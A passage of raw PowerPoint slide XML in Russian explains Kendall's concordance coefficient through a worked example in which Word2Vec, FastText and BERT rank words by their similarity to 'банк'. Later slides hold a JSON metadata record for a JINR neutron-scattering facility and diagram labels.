                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t>Значение </a:t>
                </a:r>
                <a14:m>
                  <m:oMath xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math">
                    <m:r>
                      <a:rPr lang="ru-RU" sz="1600" b="0" i="1" u="sng" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="1D1D2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ru-RU" sz="1600" b="0" i="0" u="sng" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t> = 1 — полное согласие </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ru-RU" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t>(все ранжируют одинаково).</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="0" indent="0" algn="just">
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="ru-RU" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t>Особенно полезен, когда есть 3 и более оценщика, и мы хотим понять: «А похожи ли их мнения?»</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr marL="0" indent="0" algn="just">
                  <a:buNone/>
                </a:pPr>
                <a:endParaRPr lang="ru-RU" sz="1600" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1D1D20"/>
                  </a:solidFill>
                  <a:latin typeface="system-ui"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="0" indent="0" algn="just">
                  <a:buNone/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="ru-RU" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t>Формула коэффициента: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1D1D2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600" b="0" i="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="1D1D2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1D1D2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1D1D2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1600" b="0" i="1" smtClean="0">
                              <a:solidFill>
                                <a:srgbClr val="1D1D2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1D1D2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1D1D2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1D1D2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rgbClr val="1D1D2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1D1D2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1D1D2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1D1D2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rgbClr val="1D1D2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rgbClr val="1D1D2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solidFill>
                                <a:srgbClr val="1D1D2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rgbClr val="1D1D20"/>
                          </a:solidFill>
                          <a:effectLst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1600" b="0" i="1" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="1D1D20"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Cambria Math" panose="02040503050406030204" pitchFamily="18" charset="0"/>
                        </a:rPr>
                        <m:t>где:</m:t>
                      </m:r>
                    </m:oMath>
                  </m:oMathPara>
                </a14:m>
                <a:endParaRPr lang="ru-RU" sz="1600" b="0" i="0" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1D1D20"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="system-ui"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="just"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t>n – </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ru-RU" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t>количество объектов (слов)</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="just"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t>m – </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ru-RU" sz="1600" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t>количество «оценщиков» (моделей)</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="just"/>
                <a:r>
                  <a:rPr lang="en-US" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t>S – </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ru-RU" sz="1600" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t>сумма квадратов отклонений сумм рангов от их среднего значения</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="just"/>
                <a:endParaRPr lang="ru-RU" sz="1600" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
        </mc:Choice>
        <mc:Fallback xmlns="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DFE5B2B3-EE19-4F52-8EFF-CCD09929F4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/>
              </p:nvPr>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="141290" y="613676"/>
                <a:ext cx="5151686" cy="5630648"/>
              </a:xfrm>
              <a:blipFill>
                <a:blip r:embed="rId3"/>
                <a:stretch>
                  <a:fillRect l="-592" t="-758" r="-7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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AC48E46-2A58-4100-8F1B-5B7AA552E955}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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79B16F-F0A3-45F4-84B6-6C934B2D2CB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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1121AF-4406-49C5-8415-F777473FD78F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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350C8F-A2C1-42B3-A53C-4E45246C95A5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42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4BF88-E432-4093-B0BC-1E8E9340DEA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5474650" y="642623"/>
            <a:ext cx="627166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1D1D20"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="system-ui"/>
              </a:rPr>
              <a:t>Допустим, у нас есть три слова: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D1D20"/>
                </a:solidFill>
                <a:latin typeface="system-ui"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D20"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="system-ui"/>
              </a:rPr>
              <a:t>кредит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D1D20"/>
                </a:solidFill>
                <a:latin typeface="system-ui"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D20"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="system-ui"/>
              </a:rPr>
              <a:t>река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D1D20"/>
                </a:solidFill>
                <a:latin typeface="system-ui"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D20"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="system-ui"/>
              </a:rPr>
              <a:t>счет</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="1600" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1D1D20"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="system-ui"/>
              </a:rPr>
              <a:t>И мы хотим узнать, насколько каждая из трёх моделей (Word2Vec, FastText, BERT) считает их близкими к слову «банк».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4AAB8042-F08F-45C0-8241-8C460188C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400125"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5474650" y="2249707"/>
          <a:ext cx="6271660" cy="159498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567915">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3908954346"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1567915">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="848992369"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1567915">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1527908793"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1567915">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="511361025"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="398745"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Слово</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" dirty="0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Word2Vec</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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FastText</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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BERT</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US">
                        <a:effectLst/>
                        <a:latin typeface="system-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8900006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="398745"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Кредит</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" dirty="0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0.85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0.88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0.90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8495186"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="398745"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река</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" dirty="0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0.40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0.35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0.30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5560679"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="398745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счет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0.70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0.75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0.80</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="system-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042600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C238C47A-A380-48ED-8DC6-298630DD5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011988"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5474650" y="3899133"/>
          <a:ext cx="6232760" cy="173736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558190">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4138480939"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1558190">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4099411124"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1558190">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1990801878"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1558190">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3675548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Слово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Word2Vec (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ранг)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FastText (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ранг)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BERT (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>ранг)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56611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кредит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1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1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1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613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река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3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3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3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2303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счет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2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2</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU">
                        <a:effectLst/>
                        <a:latin typeface="system-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2</a:t>
                      </a:r>
                      <a:endParaRPr lang="ru-RU" dirty="0">
                        <a:effectLst/>
                        <a:latin typeface="system-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406457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DC228C-65E2-4BCA-B0C8-19D15FC8EDB6}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5513552" y="5778135"/>
                <a:ext cx="61938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1D1D20"/>
                    </a:solidFill>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t>В</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ru-RU" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t>се три модели одинаково ранжируют слова</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="ru-RU" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t> (</a:t>
                </a:r>
                <a14:m>
                  <m:oMath xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math">
                    <m:r>
                      <a:rPr lang="ru-RU" i="1" smtClean="0">
                        <a:solidFill>
                          <a:srgbClr val="1D1D2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ru-RU" b="0" i="0" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="1D1D20"/>
                    </a:solidFill>
                    <a:effectLst/>
                    <a:latin typeface="system-ui"/>
                  </a:rPr>
                  <a:t> = 1).</a:t>
                </a:r>
                <a:endParaRPr lang="ru-R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DC228C-65E2-4BCA-B0C8-19D15FC8E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552" y="5778135"/>
                <a:ext cx="6193856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7720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8"/>
          <p:cNvSpPr/>
          <p:nvPr/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6" name="Рисунок 9"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="192960" y="747000"/>
            <a:ext cx="1869120" cy="547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7" name="Рисунок 11"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2519640" y="784800"/>
            <a:ext cx="8742960" cy="2203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8" name="Рисунок 99"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3355200" y="3085200"/>
            <a:ext cx="7995600" cy="3098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22D82DF9-E2AB-4690-9877-14D32A019536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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DE6685-72BE-46FA-B715-BD305342EA43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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9405AE-C86F-46FB-8B91-26AF03A367B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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350C8F-A2C1-42B3-A53C-4E45246C95A5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43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0"/>
          <p:cNvSpPr/>
          <p:nvPr/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20" name="Рисунок 136"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="360" y="1486800"/>
            <a:ext cx="3153960" cy="473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1" name="Рисунок 15"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2540520" y="659880"/>
            <a:ext cx="2964240" cy="21744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522" name="Прямая соединительная линия 4"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="521" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2015280" y="1747080"/>
            <a:ext cx="525600" cy="2247120"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="6350">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="Прямоугольник 137"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5915520" y="822600"/>
            <a:ext cx="5736960" cy="541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{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"ID": "2.FSD",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"DATE_CREATED": "2023-10-04T10:15:07.136218",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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" b="1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TYPE</a:t>
            </a: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": "PROJECT",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chemeClr val="dk2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Noto Mono"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Noto Mono"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Noto Mono"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>PARENTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Noto Mono"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>": [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chemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Noto Mono"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>       "1.FLNP"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chemeClr val="accent2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Noto Mono"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>   ]</a:t>
            </a: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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" b="1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NAME_RUS</a:t>
            </a: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": "ФСД",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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" b="1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NAME_ENG</a:t>
            </a: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": "FSD",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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" b="1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DESCRIPTION_RUS</a:t>
            </a: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": "ИССЛЕДОВАНИЕ ВНУТРЕННИХ</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1300"/>
            </a:b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                    МЕХАНИЧЕСКИХ НАПРЯЖЕНИЙ В</a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1300"/>
            </a:b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                    МАТЕРИАЛАХ",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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" b="1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DESCRIPTION_ENG</a:t>
            </a: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": "STUDIES OF INTERNAL </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1300"/>
            </a:b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                    MECHANICAL STRESSES IN </a:t>
            </a:r>
            <a:br>
              <a:rPr sz="1300"/>
            </a:b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                    MATERIALS",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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" b="1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URL</a:t>
            </a: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":</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU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 </a:t>
            </a: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"HTTPS://FLNP.JINR.INT/RU/GLAVNAYA/USTANOVKI/MATERIALY/FSD",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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" b="1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RESPONSIBLE</a:t>
            </a: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": "PAPUSHKIN IGOR VIKTOROVICH",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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" b="1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TAGS</a:t>
            </a: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": [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     "NEUTRON",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     "SCATTERING"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],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"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1300" b="1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INFORMATION</a:t>
            </a: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": "",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   "WHO_CREATED": 18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300" b="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Noto Mono"/>
                <a:ea typeface="DejaVu Sans"/>
              </a:rPr>
              <a:t>}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63105B-DF49-4299-B344-B0F29E2518EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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682345-65E2-4D2F-96E6-89ABAF7EE1E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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FEB5E0-7EA7-45BE-B424-D48D30274BDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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350C8F-A2C1-42B3-A53C-4E45246C95A5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44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4"/>
          <p:cNvSpPr/>
          <p:nvPr/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25" name="Рисунок 158"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="613440"/>
            <a:ext cx="9078480" cy="2588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6" name="Рисунок 160"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2629080" y="2753280"/>
            <a:ext cx="9563040" cy="3512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753FAB4A-51A6-475A-9949-5F8B64FB47AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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173C71-5214-40C6-A04C-C6D2C87D54F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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C10A88-C254-4105-A89B-DE61EDE60389}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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350C8F-A2C1-42B3-A53C-4E45246C95A5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45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8"/>
          <p:cNvSpPr/>
          <p:nvPr/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28" name="Рисунок 17"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="567000"/>
            <a:ext cx="4067640" cy="3962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9" name="Рисунок 18"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4067640" y="567000"/>
            <a:ext cx="6862680" cy="5689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768657CE-34E1-4DED-AFCC-D670771D8F79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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0E7B90-8762-4A68-972E-B12E0D80DE0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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54EF6F-4B53-4E2F-9DF8-5A11459EA08E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr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350C8F-A2C1-42B3-A53C-4E45246C95A5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46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20"/>
          <p:cNvSpPr/>
          <p:nvPr/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31" name="Рисунок 20"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect l="3178" b="4727"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1993320" y="980280"/>
            <a:ext cx="7838640" cy="4752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2" name="Полилиния 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2685600" y="2547360"/>
            <a:ext cx="6676560" cy="2114280"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="textAreaLeft" fmla="*/ 0 w 6676560"/>
              <a:gd name="textAreaRight" fmla="*/ 6677640 w 6676560"/>
              <a:gd name="textAreaTop" fmla="*/ 0 h 2114280"/>
              <a:gd name="textAreaBottom" fmla="*/ 2115360 h 2114280"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="textAreaLeft" t="textAreaTop" r="textAreaRight" b="textAreaBottom"/>
            <a:pathLst>
              <a:path w="7095344" h="2490798">
                <a:moveTo>
                  <a:pt x="316739" y="106631"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="585517" y="252104"/>
                  <a:pt x="1357216" y="698220"/>
                  <a:pt x="1779779" y="912965"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2202343" y="1127710"/>
                  <a:pt x="2369982" y="1274568"/>
                  <a:pt x="2852120" y="1395103"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3334258" y="1515638"/>
                  <a:pt x="4672608" y="1636173"/>
                  <a:pt x="4672608" y="1636173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5192153" y="1702675"/>
                  <a:pt x="5575924" y="1724841"/>
                  <a:pt x="5969393" y="1794114"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6362862" y="1863387"/>
                  <a:pt x="6903189" y="1936816"/>
                  <a:pt x="7033422" y="2051809"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7163655" y="2166802"/>
                  <a:pt x="7097154" y="2442507"/>
                  <a:pt x="6750790" y="2484071"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6404426" y="2525635"/>
                  <a:pt x="5458160" y="2363536"/>
                  <a:pt x="4955240" y="2301191"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4452320" y="2238846"/>
                  <a:pt x="3733270" y="2109998"/>
                  <a:pt x="3733270" y="2109998"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3306550" y="2040725"/>
                  <a:pt x="2838266" y="1992234"/>
                  <a:pt x="2394920" y="1885554"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1951575" y="1778874"/>
                  <a:pt x="1397393" y="1614005"/>
                  <a:pt x="1073197" y="1469918"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="749001" y="1325831"/>
                  <a:pt x="627080" y="1196984"/>
                  <a:pt x="449742" y="1021031"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="272404" y="845078"/>
                  <a:pt x="56273" y="577686"/>
                  <a:pt x="9168" y="414202"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="-37937" y="250718"/>
                  <a:pt x="108921" y="88620"/>
                  <a:pt x="167110" y="40129"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="225299" y="-8362"/>
                  <a:pt x="47961" y="-38842"/>
                  <a:pt x="316739" y="106631"/>
                </a:cubicBezTo>
                <a:close/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33" name="TextBox 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8157600" y="3722400"/>
            <a:ext cx="147744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US" sz="1600" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0055A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="Segoe UI"/>
              </a:rPr>
              <a:t>MPD MC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4" name="Скругленный прямоугольник 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4420800" y="1272600"/>
            <a:ext cx="2207520" cy="258768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35" name="TextBox 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1638000" y="1198080"/>
            <a:ext cx="283104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US" sz="1600" b="1" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="0055A0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Light"/>
                <a:ea typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Folding@Home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536" name="Прямая со стрелкой 23"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2596680" y="6097680"/>
            <a:ext cx="7130160" cy="1080"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
